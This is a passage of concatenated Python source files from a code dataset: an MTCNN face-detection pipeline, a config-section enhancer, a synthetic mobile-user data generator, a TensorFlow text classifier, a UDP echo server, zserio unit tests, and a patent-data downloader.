showTempImage( img[:, :, ::-1], total_boxes )\n\n numbox = total_boxes.shape[0]\n if numbox > 0:\n # second stage\n tempimg = np.zeros( ( 24, 24, 3, numbox ) )\n #根据bbox坐标去原图截出图片后,resize为24*24输入到Rnet\n for k in range( 0, numbox ):\n tmp = np.zeros( ( int( tmph[k] ), int( tmpw[k] ), 3 ) )\n tmp[ dy[k] -1 : edy[k], dx[k]-1:edx[k], : ] = img[ y[k]-1:ey[k], x[k]-1:ex[k], : ] #截图\n if tmp.shape[0] > 0 and tmp.shape[1] > 0 or tmp.shape[0] == 0 and tmp.shape[1] == 0:\n tempimg[ :, :, :, k ] = imresample( tmp, ( 24, 24 ) ) #缩放\n else:\n return np.empty()\n\n tempimg = ( tempimg - 127.5 ) * 0.0078125\n tempimg1 = np.transpose( tempimg, ( 3, 1, 0, 2 ) )\n out = rnet( tempimg1 ) #Rnet仍旧会输出二分类one-hot2个输出、bbox的坐标偏移量4个输出、landmark10个输出\n out0 = np.transpose( out[0] )\n out1 = np.transpose( out[1] )\n score = out1[ 1, : ]\n ipass = np.where( score > threshold[1] ) #根据二分类得分干掉大部分不是人脸的候选\n total_boxes = np.hstack( [ total_boxes[ ipass[0], 0:4 ].copy(), np.expand_dims( score[ipass].copy(), 1 ) ] )\n mv = out0[ :, ipass[0] ]\n if total_boxes.shape[0] > 0:\n pick = nms( total_boxes, 0.7, 'Union' )\n total_boxes = total_boxes[ pick, : ]\n total_boxes = bbreg( total_boxes.copy(), np.transpose( mv[:, pick] ) )\n total_boxes = rerec( total_boxes.copy() )\n\n showTempImage( img[:, :, ::-1], total_boxes )\n\n numbox = total_boxes.shape[0]\n if numbox > 0:\n # third stage\n total_boxes = np.fix( total_boxes ).astype( np.int32 )\n dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph = pad( total_boxes.copy(), w, h )\n tempimg = np.zeros(( 48, 48, 3, numbox ) )\n for k in range( 0, numbox ): ##根据Rnet输出bbox坐标去原图截出图片后,resize为48*48输入到Onet\n tmp = np.zeros( ( int( tmph[k] ), int( tmpw[k] ), 3 ) )\n tmp[ dy[k]-1:edy[k], dx[k]-1:edx[k], : ] = img[ y[k]-1:ey[k], x[k]-1:ex[k], : ]\n if tmp.shape[0] > 0 and tmp.shape[1] > 0 or tmp.shape[0] == 0 and tmp.shape[1] == 0:\n tempimg[ :, :, :, k ] = imresample( tmp, ( 48, 48) )\n else:\n return np.empty()\n tempimg = ( tempimg - 127.5 ) * 0.0078125\n tempimg1 = np.transpose( tempimg, ( 3, 1, 0, 2 ) )\n out = onet( tempimg1 )\n out0 = np.transpose( out[0] )\n out1 = np.transpose( out[1] )\n out2 = np.transpose( out[2] )\n score = out2[ 1, : ]\n points = out1\n ipass = np.where( score > threshold[2] )\n points = points[:,ipass[0]]\n total_boxes = np.hstack( [ total_boxes[ ipass[0], 0:4].copy(), np.expand_dims( score[ipass].copy(), 1 ) ] )\n mv = out0[ :, ipass[0] ]\n\n w = total_boxes[:,2]-total_boxes[:,0]+1\n h = total_boxes[:,3]-total_boxes[:,1]+1\n points[0:5,:] = np.tile(w,(5, 1))*points[0:5,:] + np.tile(total_boxes[:,0],(5, 1))-1\n points[5:10,:] = np.tile(h,(5, 1))*points[5:10,:] + np.tile(total_boxes[:,1],(5, 1))-1\n if total_boxes.shape[0]>0:\n total_boxes = bbreg(total_boxes.copy(), np.transpose(mv))\n pick = nms(total_boxes.copy(), 0.7, 'Min')\n total_boxes = total_boxes[pick,:]\n points = points[:,pick]\n\n return total_boxes, points\n\n\ndef bbreg( boundingbox, reg ):\n '''\n 加偏移后的坐标,校正 bounding boxes\n :param boundingbox:\n :param reg:\n :return:\n '''\n if reg.shape[1] == 1:\n reg = np.reshape( reg, ( reg.shape[2], reg.shape[3] ) )\n\n w = boundingbox[ :, 2 ] - boundingbox[ :, 0 ] + 1\n h = boundingbox[ :, 3 ] - boundingbox[ :, 1 ] + 1\n b1 = boundingbox[ :, 0 ] + reg[ :, 0 ] * w\n b2 = boundingbox[ :, 1 ] + reg[ :, 1 ] * h\n b3 = boundingbox[ :, 2 ] + reg[ :, 2 ] * w\n b4 = boundingbox[ :, 3 ] + reg[ :, 3 ] * h\n boundingbox[ :, 0:4 ] = np.transpose( np.vstack( [ b1, b2, b3, b4 ] ) )\n return boundingbox\n\ndef generateBoundingBox( imap, reg, scale, t ):\n '''\n Use heatmap to generate bounding boxes\n 用热力图产生bounding boxes?\n :param img: 是否为正类\n :param reg: boundingbox偏移\n :param scale: 缩小的比例\n :param t: 阈值\n :return: 函数最用为输出第一层每12*12大小的坐标,偏移,及预测得分\n '''\n stride = 2\n cellsize = 12\n\n #### 转置计算很常见,目的只要为了方便比大小,做运算。通用目标检测中也常用,\n # 对位置坐标进行转置\n imap = np.transpose( imap )\n dx1 = np.transpose( reg[ :,:,0 ] )\n dy1 = np.transpose( reg[ :,:,1 ] )\n dx2 = np.transpose( reg[ :,:,2 ] )\n dy2 = np.transpose( reg[ :,:,3 ] )\n\n ###筛选出大于阈值的坐标。因为每个小单元格有一个预测概率值,四个坐标\n # 偏移值 H/12,W/12,y,x可看成index\n y, x = np.where( imap >= t )\n\n if y.shape[0] == 1:\n dx1 = np.flipud( dx1 ) #矩阵上下翻转(列翻转,行不变)\n dy1 = np.flipud( dy1 )\n dx2 = np.flipud( dx2 )\n dy2 = np.flipud( dy2 )\n\n score = imap[ ( y, x ) ] ###得分即为预测为人脸的概率,筛选大于阈值的预测框得分\n reg = np.transpose( np.vstack( [ dx1[(y,x)], dy1[(y,x)], dx2[(y,x)], dy2[(y,x)] ] ) )\n if reg.size == 0:\n reg = np.empty( ( 0, 3 ) )\n bb = np.transpose( np.vstack( [y,x] ) )\n #q1,q2值应为在原图中每一个预测框的左上角,右下角坐标\n q1 = np.fix( (stride * bb + 1) / scale ) #np.fix: float转为int\n q2 = np.fix( (stride * bb + cellsize - 1 + 1) / scale )\n boundingbox = np.hstack( [ q1, q2, np.expand_dims( score, 1 ), reg ] )\n return boundingbox, reg\n\ndef pad( total_boxes, w, h ):\n '''\n Compute the padding coordinates (pad the bounding boxes to square)\n 对坐标进行修剪,使其不超出图片大小\n :param total_boxes:\n :param w:\n :param h:\n :return:\n '''\n tmpw = ( total_boxes[ :, 2 ] - total_boxes[ :, 0 ] + 1 ).astype( np.int32 )\n tmph = ( total_boxes[ :, 3 ] - total_boxes[ :, 1 ] + 1 ).astype( np.int32 )\n numbox = total_boxes.shape[0]\n\n dx = np.ones( ( numbox ), dtype=np.int32 )\n dy = np.ones( ( numbox ), dtype=np.int32 )\n edx = tmpw.copy().astype( np.int32 )\n edy = tmph.copy().astype( np.int32 )\n\n x = total_boxes[ :, 0 ].copy().astype( np.int32 )\n y = total_boxes[ :, 1 ].copy().astype( np.int32 )\n ex = total_boxes[ :, 2 ].copy().astype( np.int32 )\n ey = total_boxes[ :, 3 ].copy().astype( np.int32 )\n\n tmp = np.where( ex > w )\n edx.flat[ tmp ] = np.expand_dims( -ex[tmp] + w + tmpw[tmp], 1 )\n ex[ tmp ] = w\n\n tmp = np.where( ey > h )\n edy.flat[ tmp ] = np.expand_dims( -ey[tmp] + h + tmph[tmp], 1 )\n ey[ tmp ] = h\n\n tmp = np.where( x < 1 )\n dx.flat[ tmp ] = np.expand_dims( 2 - x[tmp], 1 )\n x[ tmp ] = 1\n\n tmp = np.where( y < 1 )\n dy.flat[ tmp ] = np.expand_dims( 2 - y[tmp], 1 )\n y[ tmp ] = 1\n\n return dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph\n\ndef rerec( bboxA ):\n '''\n Convert bboxA to square(平方)\n 使预测框变为正方形\n :param bboxA:\n :return:\n '''\n h = bboxA[ :, 3 ] - bboxA[ :, 1 ]\n w = bboxA[ :, 2 ] - bboxA[ :, 0 ]\n l = np.maximum( w, h )\n bboxA[ :, 0 ] = bboxA[ :, 0 ] + w * 0.5 - l * 0.5\n bboxA[ :, 1 ] = bboxA[ :, 1 ] + h * 0.5 - l * 0.5\n bboxA[ :, 2:4 ] = bboxA[ :, 0:2 ] + np.transpose( np.tile( l, ( 2, 1 ) ) )\n return bboxA\n\n'''非极大值抑制(NMS)顾名思义就是抑制不是极大值的元素,搜索局部的极大值'''\ndef nms( boxes, threshold, method ):\n '''\n\n :param boxes:\n :param threshold:\n :param method:\n :return:\n '''\n if boxes.size == 0:\n return np.empty( (0, 3) )\n x1 = boxes[ :, 0 ]\n y1 = boxes[ :, 1 ]\n x2 = boxes[ :, 2 ]\n y2 = boxes[ :, 3 ]\n s = boxes[ :, 4 ] #每个box的信心指数?\n\n area = ( x2 - x1 + 1 ) * ( y2 - y1 + 1 ) #计算每个box的面积\n I = np.argsort( s )\n pick = np.zeros_like( s, dtype=np.int16 )\n counter = 0\n while I.size > 0:\n i = I[-1]\n pick[ counter ] = i\n counter += 1\n idx = I[ 0 : -1 ]\n xx1 = np.maximum( x1[i], x1[idx] )\n yy1 = np.maximum( y1[i], y1[idx] )\n xx2 = np.minimum( x2[i], x2[idx] )\n yy2 = np.minimum( y2[i], y2[idx] )\n w = np.maximum( 0.0, xx2-xx1+1 )\n h = np.maximum( 0.0, yy2-yy1+1 )\n inter = w * h\n if method is 'Min':\n o = inter / np.minimum( area[i], area[idx] )\n else:\n o = inter / ( area[i] + area[idx] - inter )\n\n I = I[ np.where( o <= threshold ) ]\n\n pick = pick[ 0: counter ]\n return pick\n\ndef imresample( img, sz ):\n '''\n img resize\n :param ing:\n :param sz:\n :return:\n '''\n im_data = cv2.resize( img, ( sz[1], sz[0]), interpolation=cv2.INTER_AREA )\n return im_data\n\ndef showTempImage( rgb_image, boxes ):\n '''\n\n :param image:\n :return:\n '''\n #image = rgb_image[ :, :, ::-1 ]\n image = rgb_image.copy()\n for i in range( 0, boxes.shape[0] ):\n image = cv2.rectangle( image,\n ( int( boxes[i,0] ), int( boxes[i,1] ) ),\n ( int( boxes[i,2] ), int( boxes[i,3] ) ),\n ( 255,255, 0 ))\n\n cv2.imshow( 'Inter Show', image )\n cv2.waitKey( 0 )\n cv2.destroyAllWindows()\n","sub_path":"7-1-mtcnn-face-detection/detect_face.py","file_name":"detect_face.py","file_ext":"py","file_size_in_byte":25083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"428986993","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.linux-x86_64/egg/config_enhance/__init__.py\n# Compiled at: 2013-11-15 17:31:04\nimport logging\nfrom ConfigParser import ConfigParser as CP\n__ALL__ = [\n 'enhance_platform_versions', 'enhance']\nLOG = logging.getLogger(__name__)\n\nclass EnhanceSection(object):\n \"\"\"Enhance a section based on the content of a << item\n \n operators are\n <[sectionname] - bring in values that don't already exist in the section\n +[sectionname] - bring in all values, overwriting any current content\n -[sectionname] - remove values that exist in the named section\n\n The enhancements are executed in order, which only matters if you use\n the removal operator. Then order can impact the behavior of a following\n '<'.\n \"\"\"\n\n def __init__(self, config, name):\n self.config = config\n self.name = name\n self.ops = []\n self._extract_ops()\n\n @property\n def is_complete(self):\n return len(self.ops) == 0\n\n def __call__(self):\n \"\"\"Apply all the enhancements to the current section.\"\"\"\n for op_type, from_section in self.ops:\n if op_type == '<':\n self._enhance_with_base(from_section)\n elif op_type == '+':\n self._enhance_with_mixin(from_section)\n elif op_type == '-':\n self._enhance_with_removal(from_section)\n\n self.ops = []\n\n def _enhance_with_base(self, from_section):\n for k, v in self.config.items(from_section):\n if not self.config.has_option(self.name, k):\n self.config.set(self.name, k, v)\n\n def _enhance_with_mixin(self, from_section):\n for k, v in self.config.items(from_section):\n self.config.set(self.name, k, v)\n\n def _enhance_with_removal(self, from_section):\n for k, v in self.config.items(from_section):\n self.config.remove_option(self.name, k)\n\n def _extract_ops(self):\n op_key = '<<'\n simple_op_key = '<'\n if self.config.has_option(self.name, op_key):\n op_item = self.config.get(self.name, op_key)\n self.config.remove_option(self.name, op_key)\n self.ops = parse_ops_from_config_item(op_item)\n if self.config.has_option(self.name, simple_op_key):\n value = self.config.get(self.name, simple_op_key)\n value = value.strip()\n self.ops.insert(0, ('<', value))\n\n\ndef parse_ops_from_config_item(value):\n \"\"\"Parse the <<= config item for enhancements.\"\"\"\n values = [ vv for vv in value.split() if vv ]\n ops = []\n next_is_section = False\n last_op = None\n for vv in values:\n if next_is_section:\n ops.append((last_op, vv))\n next_is_section = False\n last_op = None\n elif len(vv) == 1:\n last_op = vv\n next_is_section = True\n elif len(vv) > 1:\n op, section = vv[0], vv[1:]\n ops.append((vv[0], vv[1:]))\n\n return ops\n\n\nclass Target(object):\n \"\"\"A target that needs to be built.\n\n Maintains a list of required inputs, impacted dependants, and the action\n to perform when the required inputs are complete.\n\n @reqs - the targets needed to build this target\n @deps - dependants that need this\n @action - action to perfom to build this target\n\n The action must be callable with no parameters. It must implement\n \"is_complete\", which should return true when the target that will\n result from the action is complete.\n\n The action may just deteect that no action is needed and mark itself\n as complete.\n \"\"\"\n\n def __init__(self, action):\n self.action = action\n self.reqs = set()\n self.deps = set()\n self._reqs_complete = False\n\n @property\n def reqs_complete(self):\n if self._reqs_complete:\n return True\n for req in self.reqs:\n if not req.is_complete:\n return False\n\n self._reqs_complete = True\n return self._reqs_complete\n\n def __call__(self):\n \"\"\"Build the target by executing the action.\"\"\"\n self.action()\n\n @property\n def is_complete(self):\n return self.action.is_complete\n\n\ndef build_targets(targets):\n \"\"\"Build a list of targets.\n \n @targets - collection of targets to build\n\n Returns the targets that couldn't be built due to unmet requirements.\n \"\"\"\n seeds = [ tgt for tgt in targets if tgt.reqs_complete ]\n built = set()\n progress_made = True\n while len(seeds) and progress_made:\n new_seeds = set()\n for target in seeds:\n target()\n built.add(target)\n new_seeds.update(target.deps)\n\n seeds = [ seed for seed in new_seeds if seed.reqs_complete ]\n\n unbuilt = set(targets).difference(built)\n return unbuilt\n\n\ndef enhance_platform_versions(cp):\n section_meta = {}\n simple_op_key = '<'\n op_key = '<<'\n has_error = False\n for section in cp.sections():\n action = EnhanceSection(cp, section)\n target = Target(action)\n section_meta[section] = target\n\n for meta in section_meta.itervalues():\n for op_type, op_section in meta.action.ops:\n try:\n other_meta = section_meta[op_section]\n except KeyError as ke:\n LOG.error(\"section '%s' requires '%s', but '%s' does not exist\", section, op_section, op_section)\n has_error = True\n else:\n other_meta.deps.add(meta)\n meta.reqs.add(other_meta)\n\n unbuilt = build_targets(section_meta.values())\n\n\nenhance = enhance_platform_versions","sub_path":"pycfiles/config_field-0.2.9.tar/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"488663193","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#\n# Author: hjweddie@163.com\n# Time: Sat 03 Jan 2015 05:14:09 PM CST\n# File: user generator.py\n# Desc:\n#\nimport random\n\n\nip_areas = []\n\nwith open(\"CHINANET-20150505.txt\") as fd:\n for line in fd:\n items = line.split()\n begin = items[0]\n end = items[1]\n ip_areas.append({\"begin\": begin, \"end\": end})\n\n\ndevices = []\nwith open(\"device.txt\") as fd:\n for line in fd:\n items = line.strip(\"\\n\").split(\",\")\n devicename = items[0]\n resolution = items[1]\n osversion = items[2]\n\n devices.append({\n \"devicename\": devicename,\n \"osversion\": osversion,\n \"resolution\": resolution,\n })\n\n\nareas_count = len(ip_areas)\ndevices_count = len(devices)\n\n\ndef random_number(length):\n number = \"\"\n i = 0\n while i < length:\n number = number + str(random.randint(0, 9))\n i = i + 1\n\n return number\n\n\ndef random_ip():\n area_index = random.randint(0, areas_count - 1)\n ip_area = ip_areas[area_index]\n\n begins = ip_area[\"begin\"].split(\".\")\n ends = ip_area[\"end\"].split(\".\")\n\n ip = \"\"\n ip_subs = []\n for index in [0, 1, 2, 3]:\n begin = int(begins[index])\n end = int(ends[index])\n sub = random.randint(begin, end)\n ip_subs.append(str(sub))\n ip = \".\".join(ip_subs)\n\n #print ip_area[\"begin\"], \"~\", ip_area[\"end\"], \":\", ip\n return ip\n\n\nusers_count = 200000\n#users_count = 100\ni = 0\nusers = []\nwhile i < users_count:\n ip = random_ip()\n imei = random_number(15)\n imsi = random_number(15)\n deviceid = random_number(15)\n\n device_index = random.randint(0, devices_count - 1)\n device = devices[device_index]\n\n users.append({\n \"deviceid\": deviceid,\n \"devicename\": device[\"devicename\"],\n \"imei\": imei,\n \"imsi\": imsi,\n \"osversion\": device[\"osversion\"],\n \"resolution\": device[\"resolution\"],\n \"ip\": ip,\n })\n i = i + 1\n\n\nwith open(\"users.txt\", \"w\") as fd:\n for user in users:\n line = \"%s,%s,%s,%s,%s,%s,%s\\n\" % (\n user[\"deviceid\"],\n user[\"devicename\"],\n user[\"imei\"],\n user[\"imsi\"],\n user[\"osversion\"],\n user[\"resolution\"],\n user[\"ip\"])\n fd.write(line)\n","sub_path":"test/collectors/user_generator.py","file_name":"user_generator.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"460212916","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 29 21:43:39 2018\n\n@author: Chen\n\"\"\"\n\nimport numpy as np\nimport pandas as pds\nimport tensorflow as tf\n\ndef train_input_fn(features, labels, batch_size):\n \"\"\"An input function for training\"\"\"\n # Convert the inputs to a Dataset.\n rand_index = np.random.choice(len(features),replace=False,size = batch_size)\n# Shuffle, repeat, and batch the examples.\n rand_y = labels.loc[rand_index].values\n rand_x = features.loc[rand_index].values\n return rand_x,rand_y\n \ntf.reset_default_graph()\n\nlearning_rate = 0.1\nbatch_size = 500\n\nhidden_layer_nodes = 80\nhidden_layer_nodes2 = 100\nhidden_layer_nodes3 = 80\n\n\nkeep_prob = tf.placeholder(tf.float32) \nx_data= tf.placeholder(shape = [None,10000],dtype = tf.float32,name='x_input')\ny_target = tf.placeholder(shape = [None,3],dtype = tf.float32,name='y_input')\nA1 = tf.Variable(tf.truncated_normal(shape=[10000,hidden_layer_nodes]))\ntf.summary.histogram('weights1',A1)\nb1 = tf.Variable(tf.truncated_normal(shape=[hidden_layer_nodes]))\ntf.summary.histogram('bias1',b1)\nhidden_output = tf.nn.dropout(tf.nn.relu(tf.add(tf.matmul(x_data,A1),b1)),keep_prob)\n\n\n\nA2 = tf.Variable(tf.random_normal(shape=[hidden_layer_nodes,hidden_layer_nodes2]))\ntf.summary.histogram('weights2',A2)\nb2 = tf.Variable(tf.random_normal(shape=[hidden_layer_nodes2]))\ntf.summary.histogram('bias2',b2)\nhidden_output2 = tf.nn.dropout(tf.nn.relu(tf.add(tf.matmul(hidden_output,A2),b2)),keep_prob)\n \n\nA3 = tf.Variable(tf.random_normal(shape=[hidden_layer_nodes2,3]))\ntf.summary.histogram('weights3',A3)\nb3 = tf.Variable(tf.random_normal(shape=[3]))\ntf.summary.histogram('bias3',b3)\ny_predict = tf.add(tf.matmul(hidden_output2,A3),b3)\n\ncross_entropy = tf.reduce_mean(\n tf.nn.softmax_cross_entropy_with_logits(labels=y_target, logits=y_predict))\ntrain_step = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cross_entropy)\n\ncorrect_prediction = tf.equal(tf.argmax(y_predict,1), tf.argmax(y_target,1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\n\ninit = tf.global_variables_initializer()\nsaver = tf.train.Saver()\ntrain_data = []\ntrain_label = []\nfor i in range(7):\n X = pds.read_csv('train_s2/tfidf/train_data_{}.csv'.format(i+1))\n del X['Unnamed: 0']\n y = pds.read_csv('label_s2/tfidf/train_data_{}.csv'.format(i+1))\n del y['Unnamed: 0']\n train_data.append(X)\n train_label.append(y)\nwith tf.Session() as sess:\n sess.run(init)\n for k in range(200):\n if (k+1)==150:\n learning_rate = learning_rate/10\n for i in range(7):\n X = train_data[i]\n y = train_label[i]\n batch_data = train_input_fn(X,y,batch_size)\n rand_x = batch_data[0]\n rand_y = batch_data[1]\n sess.run(train_step, feed_dict={x_data: rand_x, y_target: rand_y, keep_prob: 0.6}) \n if (k+1)%10 == 0:\n print(\"epoch {} finished.\".format(k+1))\n for j in range(4):\n test_X = pds.read_csv('test_s2/tfidf/test_data_{}.csv'.format(j+1))\n del test_X['Unnamed: 0']\n test_y = pds.read_csv('test_label_s2/tfidf/test_data_{}.csv'.format(j+1))\n del test_y['Unnamed: 0']\n predict = pds.DataFrame(sess.run(correct_prediction, feed_dict={x_data: test_X.values, y_target: test_y.values, keep_prob: 1}))\n predict.to_csv('stage2_test_output/nn/predict_result_{}.csv'.format(j+1))\n print('Test set {} accuracy is: {}'.format(j+1,sess.run(accuracy, feed_dict={x_data: test_X.values, y_target: test_y.values, keep_prob: 1})))\n saver.save(sess, \"trained_models/stage2/nn/model.ckpt\")","sub_path":"model/s2_nn_train.py","file_name":"s2_nn_train.py","file_ext":"py","file_size_in_byte":3669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"434026247","text":"from socket import *\nserverPort = 8008\nserverSocket = socket(AF_INET,SOCK_DGRAM)\n# 默认为localhost\nserverSocket.bind((\"\",serverPort))\nprint(\"listen port\"+str(serverPort)+'...')\nwhile True:\n message,clientAddress = serverSocket.recvfrom(2048)\n string = message.decode()\n print(string)\n serverSocket.sendto(string.encode(),clientAddress)","sub_path":"applicationLayer/UDP/UDPSocketSever.py","file_name":"UDPSocketSever.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"150666124","text":"import unittest\nimport zserio\n\nfrom testutils import getZserioApi\n\nclass AutoOptionalTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.api = getZserioApi(__file__, \"optional_members.zs\").auto_optional\n\n def testEmptyConstructor(self):\n container1 = self.api.Container()\n self.assertEqual(0, container1.getNonOptionalInt())\n self.assertEqual(None, container1.getAutoOptionalInt())\n\n def testFromFields(self):\n container1 = self.api.Container.fromFields(self.NON_OPTIONAL_INT_VALUE, None)\n self.assertEqual(self.NON_OPTIONAL_INT_VALUE, container1.getNonOptionalInt())\n self.assertEqual(None, container1.getAutoOptionalInt())\n\n def testEq(self):\n container1 = self.api.Container()\n container2 = self.api.Container()\n self.assertTrue(container1 == container2)\n\n container1.setNonOptionalInt(self.NON_OPTIONAL_INT_VALUE)\n container1.setAutoOptionalInt(self.AUTO_OPTIONAL_INT_VALUE)\n container2.setNonOptionalInt(self.NON_OPTIONAL_INT_VALUE)\n self.assertFalse(container1 == container2)\n\n container2.setAutoOptionalInt(self.AUTO_OPTIONAL_INT_VALUE)\n self.assertTrue(container1 == container2)\n\n def testHash(self):\n container1 = self.api.Container()\n container2 = self.api.Container()\n self.assertEqual(hash(container1), hash(container2))\n\n container1.setNonOptionalInt(self.NON_OPTIONAL_INT_VALUE)\n container1.setAutoOptionalInt(self.AUTO_OPTIONAL_INT_VALUE)\n container2.setNonOptionalInt(self.NON_OPTIONAL_INT_VALUE)\n self.assertTrue(hash(container1) != hash(container2))\n\n container2.setAutoOptionalInt(self.AUTO_OPTIONAL_INT_VALUE)\n self.assertEqual(hash(container1), hash(container2))\n\n def testHasAutoOptionalInt(self):\n container = self.api.Container()\n container.setNonOptionalInt(self.NON_OPTIONAL_INT_VALUE)\n self.assertFalse(container.hasAutoOptionalInt())\n\n container.setAutoOptionalInt(self.AUTO_OPTIONAL_INT_VALUE)\n self.assertTrue(container.hasAutoOptionalInt())\n\n def testBitSizeOf(self):\n container = self.api.Container()\n container.setNonOptionalInt(self.NON_OPTIONAL_INT_VALUE)\n self.assertEqual(self.CONTAINER_BIT_SIZE_WITHOUT_OPTIONAL, container.bitSizeOf())\n\n container.setAutoOptionalInt(self.AUTO_OPTIONAL_INT_VALUE)\n self.assertEqual(self.CONTAINER_BIT_SIZE_WITH_OPTIONAL, container.bitSizeOf())\n\n def testInitializeOffsets(self):\n container = self.api.Container()\n container.setNonOptionalInt(self.NON_OPTIONAL_INT_VALUE)\n bitPosition = 1\n self.assertEqual(bitPosition + self.CONTAINER_BIT_SIZE_WITHOUT_OPTIONAL,\n container.initializeOffsets(bitPosition))\n\n container.setAutoOptionalInt(self.AUTO_OPTIONAL_INT_VALUE)\n self.assertEqual(bitPosition + self.CONTAINER_BIT_SIZE_WITH_OPTIONAL,\n container.initializeOffsets(bitPosition))\n\n def testWrite(self):\n container = self.api.Container()\n container.setNonOptionalInt(self.NON_OPTIONAL_INT_VALUE)\n writer = zserio.BitStreamWriter()\n container.write(writer)\n reader = zserio.BitStreamReader(writer.getByteArray())\n self._checkContainerInStream(reader, self.NON_OPTIONAL_INT_VALUE, None)\n reader.setBitPosition(0)\n readNonOptionalContainer = self.api.Container.fromReader(reader)\n self.assertEqual(self.NON_OPTIONAL_INT_VALUE, readNonOptionalContainer.getNonOptionalInt())\n self.assertFalse(readNonOptionalContainer.hasAutoOptionalInt())\n\n container.setAutoOptionalInt(self.AUTO_OPTIONAL_INT_VALUE)\n writer = zserio.BitStreamWriter()\n container.write(writer)\n reader = zserio.BitStreamReader(writer.getByteArray())\n self._checkContainerInStream(reader, self.NON_OPTIONAL_INT_VALUE, self.AUTO_OPTIONAL_INT_VALUE)\n reader.setBitPosition(0)\n readAutoOptionalContainer = self.api.Container.fromReader(reader)\n self.assertEqual(self.NON_OPTIONAL_INT_VALUE, readAutoOptionalContainer.getNonOptionalInt())\n self.assertTrue(readAutoOptionalContainer.hasAutoOptionalInt())\n self.assertEqual(self.AUTO_OPTIONAL_INT_VALUE, readAutoOptionalContainer.getAutoOptionalInt())\n\n def _checkContainerInStream(self, reader, nonOptionalIntValue, autoOptionalIntValue):\n if autoOptionalIntValue is None:\n self.assertEqual(nonOptionalIntValue, reader.readSignedBits(32))\n self.assertEqual(False, reader.readBool())\n else:\n self.assertEqual(nonOptionalIntValue, reader.readSignedBits(32))\n self.assertEqual(True, reader.readBool())\n self.assertEqual(autoOptionalIntValue, reader.readSignedBits(32))\n\n NON_OPTIONAL_INT_VALUE = -0x1EADDEAD\n AUTO_OPTIONAL_INT_VALUE = -0x1EEFBEEF\n\n CONTAINER_BIT_SIZE_WITHOUT_OPTIONAL = 32 + 1\n CONTAINER_BIT_SIZE_WITH_OPTIONAL = 32 + 1 + 32\n","sub_path":"test/language/optional_members/python/AutoOptionalTest.py","file_name":"AutoOptionalTest.py","file_ext":"py","file_size_in_byte":5018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"652698680","text":"# -*- coding: UTF-8 -*-\n# (c)2013 Mik Kocikowski, MIT License (http://opensource.org/licenses/MIT)\n# https://github.com/mkocikowski/esbench\n\nimport os.path\nimport logging\nimport argparse\nimport sys\nimport urllib2\nimport gzip\nimport itertools\nimport string\n\nimport esbench\n\nlogger = logging.getLogger(__name__)\n\n# URL = \"https://s3-us-west-1.amazonaws.com/esbench/assn_%s.gz\"\nURL = \"https://s3-us-west-1.amazonaws.com/esbench/appl_%s.gz\"\n\ndef _aa(count=None): \n i = (\"\".join(i) for i in itertools.product(string.lowercase, repeat=2))\n if count:\n i = itertools.islice(i, count) \n return i\n\n\ndef urls(count=None):\n for s in _aa(count):\n yield (URL % s)\n\n\ndef download(url, tmpd=\"/tmp\"): \n\n# \n# # make the ./tmp directory if needed\n# tmpd = os.path.abspath(\"./tmp\")\n# if not os.path.isdir(tmpd): \n# os.mkdir(tmpd, 0700)\n \n fn = os.path.basename(url)\n fn = os.path.abspath(os.path.join(tmpd, fn))\n \n logger.info(\"Downloading '%s' to '%s'\", url, fn)\n \n # if the file already exists, don't download it again\n if os.path.exists(fn): \n logger.info(\"Using cached file '%s'\", fn)\n return fn\n \n resp = urllib2.urlopen(url)\n \n with open(fn, 'w') as f:\n chunk = resp.read(2**16)\n while chunk:\n f.write(chunk)\n chunk = resp.read(2**16)\n sys.stderr.write(\".\")\n\n logger.info(\"finished downloading '%s'\", fn)\n\n resp.close()\n return fn\n\n\ndef unzip(fn): \n\n with gzip.open(fn, 'rb') as f: \n for line in f:\n yield(line.strip())\n \n\ndef feed(nocache=False): \n\n for url in urls():\n fn = download(url)\n try: \n for line in unzip(fn): \n yield line \n except IOError: \n logger.error(\"IOError reading file: '%s'. Looks like the cached data file is corrupted, it will now be removed, and downloaded again on the next test run. Moving on to the next data file - this error will not affect the test run.\", fn)\n nocache = True # this will remove the file in finally clause\n finally:\n if nocache:\n os.remove(fn)\n logger.info(\"removed file '%s'\", fn)\n\n\ndef args_parser():\n parser = argparse.ArgumentParser(description=\"esbench USPTO patent assignment downloader.\")\n parser.add_argument('-v', '--version', action='version', version=esbench.__version__)\n parser.add_argument('--nocache', action='store_true', help=\"if set, delete downloaded data (default: %(default)s)\")\n return parser\n\n\ndef main():\n\n logging.basicConfig(level=logging.WARNING)\n args = args_parser().parse_args()\n\n try: \n for line in feed(nocache=args.nocache):\n print(line) \n \n sys.exit(0)\n \n except IOError as exc:\n logger.warning(exc)\n pass\n \n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"esbench/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"248570637","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.utils.timezone\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n 